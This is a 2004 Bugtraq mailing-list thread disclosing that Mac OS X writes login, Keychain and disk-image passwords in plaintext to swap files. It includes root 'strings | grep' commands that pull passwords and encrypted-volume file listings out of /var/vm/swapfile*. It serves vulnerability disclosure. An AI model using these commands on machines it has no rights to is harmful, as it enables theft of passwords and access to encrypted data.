Re: Mac OS X stores login/Keychain/FileVault passwords on disk

[<johnny () ihackstuff com>]

The issue of getting into AES128 encrypted disk images is easy to 
unravel with this swapfile problem. 

We'll start by grabbing the volume name of an AES128 encrypted disk 
image file. Assuming the image name is test1.dmg, try: 

root# strings -8 /var/vm/swapfile* | grep -B1 test1.dmg | grep 
Volumes 
/Volumes/SECRET 

Armed with the volume name, we can grab the file listing of that 
(supposedly protected) AES128 encrypted disk image.  Since our 
volume name is 'SECRET'. Try: 

root# strings -8 /var/vm/swapfile* | grep "<string>/Volumes/SECRET" 
<string>/Volumes/SECRET/secretporn.pdf</string> 
<string>/Volumes/SECRET/secretphoto.jpg</string> 
<string>/Volumes/SECRET/badmovie.mpg</string> 
<string>/Volumes/SECRET/horriblybadmovie.mpg</string> 
<string>/Volumes/SECRET/naughty.mpg</string> 
<string>/Volumes/SECRET</string> 

To REALLY get at those (supposedly protected) files, we could use the 
password. It's easy to grab it even if it's not in the keychain: 

root# strings -8 /var/vm/swapfile* | grep -B1 "/System/Library/
CoreServices/DiskImageMounter.app" 

[... snip ... ] 
-- 
mySecretPasswordTest 
/System/Library/CoreServices/DiskImageMounter.app 
[... snip ... ] 

The only chore may be figuring out which password goes with which 
disk image. And that's not nearly the chore of popping AES128 
encryption... 

j0hnny 

http://johnny.ihackstuff.com 
johnny () ihackstuff com 



-------------------------------------
From: Adi Kriegisch <adi () cg tuwien ac at> 
To: bugtraq () securityfocus com 
Subject: Re: Mac OS X stores login/Keychain/FileVault passwords on 
disk 
Sent: Monday, July 12, 2004 9:05 AM 



The swapfiles are deleted on startup -- this means even a clean 
shutdown by 
user leaves the passwords on disk. 
So if you loose your powerbook someone might boot it in "target disk 
mode" and 
will be able to get your password! 

Adi 

=== 


 
 
It seems that Mac OS X (10.3.4 tested) doesn't bother clearing memory 
containing sensitive data, or using mlock() to avoid swapping. 

A quick grep of the swapfiles will show up various morsels: 

rez:~> sudo strings -8 /var/vm/swapfile0 |grep -A 4 -i longname 
longname 
password 
<user's password here> 
/bin/zsh 
username 
--- 
... various other occurrences follow 


Grepping for context around "password" also shows up results, and 
grepping 
for portions of a Keychain password (differing from the login password) 
will also get results. It appears that loginwindow is one of the apps 
involved, I haven't investigated what else is involved. The amount of 
memory and usage patterns of the machine will affect what gets 
swapped, 
though loginwindow seems likely to get swapped early since it is 
seldom 
used after login. 

Obviously this is only of interest if an attacker has root (or physical) 
access to a machine, however it does make FileVault or Keychain 
encryption 
fairly useless. It appears that the swapfiles are removed on shutdown 
or 
startup, though not wiped - pulling the power from a sleeping 
machine, 
and/or booting from CD, would quite easily retrieve the password(s). 

Reported to Apple on 21 June, I haven't had any response. It'd be nice 
if 
they at least said "we're taking a look if it's an issue". 

Matt